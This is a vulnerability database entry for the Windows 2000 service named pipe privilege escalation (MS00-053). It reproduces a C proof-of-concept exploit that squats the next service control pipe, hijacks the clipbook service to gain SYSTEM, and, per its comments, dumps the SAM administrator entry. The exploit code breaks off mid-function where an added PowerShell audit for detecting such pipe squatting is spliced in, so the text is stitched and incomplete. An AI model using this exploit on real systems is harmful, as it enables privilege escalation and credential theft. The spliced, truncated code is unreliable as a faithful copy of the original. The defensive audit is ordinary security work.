Microsoft Windows 2000 predictable named pipe vulnerability (MS00…
2008-04-09 04:31:42 Source: Internet
Published: 2000-08-01
Updated: 2000-08-01
Affected systems:
Microsoft Windows 2000 Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Advanced Server
Description:
BUGTRAQ ID: 1535
CVE(CAN) ID: CVE-2000-0737
Microsoft Windows is a very popular operating system published by Microsoft.
The Service Control Manager (services.exe) is the management component of Windows 2000 that allows system services to be created or modified. The SCM creates a named pipe each time a service starts. However, if a malicious program can predict and create a particular service's named pipe before that service starts, it can take on that service's privileges. This may allow an attacker to run malicious code with the privileges of a particular user or of the local system.
<*Source: Mike Schiffman (mike.schiffman@guardent.com)
Links: http://marc.theaimsgroup.com/?l=bugtraq&m=96524398014293&w=2
http://www.microsoft.com/technet/security/bulletin/MS00-053.asp
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear all risk!
/*
* Proof of Concept
* Windows2000 services named pipe vulnerability
*
* Author: Maceo
*
* Compiled with MS VC 6.0 SP3
*
* Compiled and tested on:
* D:\>uname -sv
* Windows2000 5.0.2195
*
* Vulnerability: Windows 2000 uses predictable named
* pipe names for controlling services. Any user process
* can create a named pipe with the next name and force
* a service, they can start, to connect to the pipe. Once
* connected the user process can impersonate the service,
* which in most cases runs in the SYSTEM account.
*
* Proof of concept: This code abuses the clipbook service
* to run as the SYSTEM account and then dumps information
* from the local SAM database.
*
* This file is for educational purposes only. As many
* would agree, the default install of a W2K server is
* inherently insecure against interactive users. One
* does not have to dig very hard to find a way to
* elevate a user's privileges when placed in an interactive
* situation, such as logged in at a console. For instance:
* D:\>time
* The current time is: 23:28:38.42
* D:\>at 23:29 /interactive cmd.exe
*
* It is with this in mind I release the following code.
*
* Disclaimer: This file is intended as proof of concept, and
* is not intended to be used for illegal purposes. The author
* does not accept responsibility for ANY damage incurred
* by the use of it.
*
*/
#include <stdio.h>
#include <windows.h>
#define ABUSE_SVC "clipbook"
#define SVC_KEY "SYSTEM\\CurrentControlSet\\Control\\ServiceCurrent"
#define SAM_KEY "SAM\\SAM\\Domains\\Account\\Users\\000001F4"
int main( )
{
HKEY hOpen;
DWORD dwNumber = 0;
DWORD dwType = REG_DWORD;
DWORD dwSize = sizeof(DWORD);
char szNetCmd[256];
// make sure the service we want to abuse is stopped. //
sprintf (szNetCmd, "net stop %s", ABUSE_SVC);
system (szNetCmd);
// open the current service number key //
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, SVC_KEY, 0, KEY_READ, &hOpen))
{
printf ("Failed to open key:\n %s\n", SVC_KEY);
return 1;
}
// read the key //
if (RegQueryValueEx (hOpen, "", NULL, &dwType, (BYTE *) &dwNumber, &dwSize))
{
RegCloseKey (hOpen);
printf ("Failed to read key:\n %s\n", SVC_KEY);
return 2;
}
// close the key //
RegCloseKey (hOpen);
// build the next named pipe name //
char szPipe[64];
sprintf(szPipe, "\\\\.\\pipe\\net\\NtControlPipe%lu", dwNumber);
// create the named pipe before scm can //
HANDLE hPipe = 0;
hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
PIPE_TYPE_MESSAGE|PIPE_WAIT,
2, 0, 0, 0, NULL);
if (hPipe == INVALID_HANDLE_VALUE)
{
printf ("Failed to create named pipe:\n %s\n", szPipe);
return 3;
}
// start the service we are going to abuse. //
sprintf(szNetCmd, "start /min net start %s", ABUSE_SVC);
system(szNetCmd);
// wait for the service to connect //
ConnectNamedPipe (hPipe, NULL);
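As an added example (not part of the original advisory and not the PoC author's code), the following PowerShell audit check looks for the condition the PoC relies on from the defender's side: a control pipe named \\.\pipe\net\NtControlPipe<N> that already exists although the SCM has not yet handed out number N. It reads the same ServiceCurrent value the PoC reads and lists the pipe namespace through System.IO.Directory. Assumptions: the semantics the PoC documents for Windows 2000 (the registry value holds the number the SCM will use next), so a pipe whose number is at or beyond the counter was created by something other than the SCM; the function and parameter names are my own; the sample pipe names are constructed.

```powershell
# Added example, not from the original advisory. Audit for service control pipe squatting.
# Assumption (taken from the PoC's use of the value, not re-verified on later Windows versions):
# HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent holds the number the SCM will use for
# the NEXT service it starts. A pipe with that number or higher therefore predates the SCM's
# own creation of it.

function Find-SuspectControlPipe {
    param(
        [Parameter(Mandatory)] [int]      $Counter,   # value read from ServiceCurrent
        [Parameter(Mandatory)] [string[]] $PipeNames  # entries from the \\.\pipe\ namespace
    )
    foreach ($name in $PipeNames) {
        # Only the SCM control pipes are of interest; the trailing digits are the sequence number.
        if ($name -match 'NtControlPipe(\d+)$') {
            $n = [int]$Matches[1]
            if ($n -ge $Counter) {
                [pscustomobject]@{
                    Pipe    = $name
                    Number  = $n
                    Counter = $Counter
                    Reason  = 'control pipe exists before the SCM would have created it'
                }
            }
        }
    }
}

function Invoke-ControlPipeAudit {
    # Live variant: reads the real counter and the real pipe namespace (Windows host required;
    # reading the key and listing pipes needs no elevated privilege).
    $key     = 'HKLM:\SYSTEM\CurrentControlSet\Control\ServiceCurrent'
    $counter = [int](Get-ItemProperty -Path $key).'(default)'
    $pipes   = [System.IO.Directory]::GetFiles('\\.\pipe\')
    $suspects = @(Find-SuspectControlPipe -Counter $counter -PipeNames $pipes)
    if ($suspects.Count -eq 0) {
        Write-Output "ServiceCurrent=$counter; no control pipe at or beyond the counter."
    } else {
        $suspects | Format-Table -AutoSize
    }
}

# Constructed sample data so the logic can be exercised without touching the registry.
$sampleCounter = 17
$samplePipes = @(
    '\\.\pipe\net\NtControlPipe15',   # older running service: legitimate
    '\\.\pipe\net\NtControlPipe16',   # last service the SCM started: legitimate
    '\\.\pipe\net\NtControlPipe17',   # the number the SCM would use next: not the SCM's pipe
    '\\.\pipe\lsass'                  # unrelated pipe, ignored
)
Find-SuspectControlPipe -Counter $sampleCounter -PipeNames $samplePipes | Format-Table -AutoSize
# Expected on the sample: a single row for NtControlPipe17.

# Live run:
# Invoke-ControlPipeAudit
```

A hit from this check only says that a control pipe exists ahead of the SCM's counter; whether it is a squat is decided by who owns the pipe handle and which process created it, which is the next thing to pull from the host. On a patched system the SCM's own creation of the pipe fails closed instead of connecting the service to a pre-existing instance, so the audit is mainly useful as a compensating check on hosts where the MS00-053 fix cannot be confirmed.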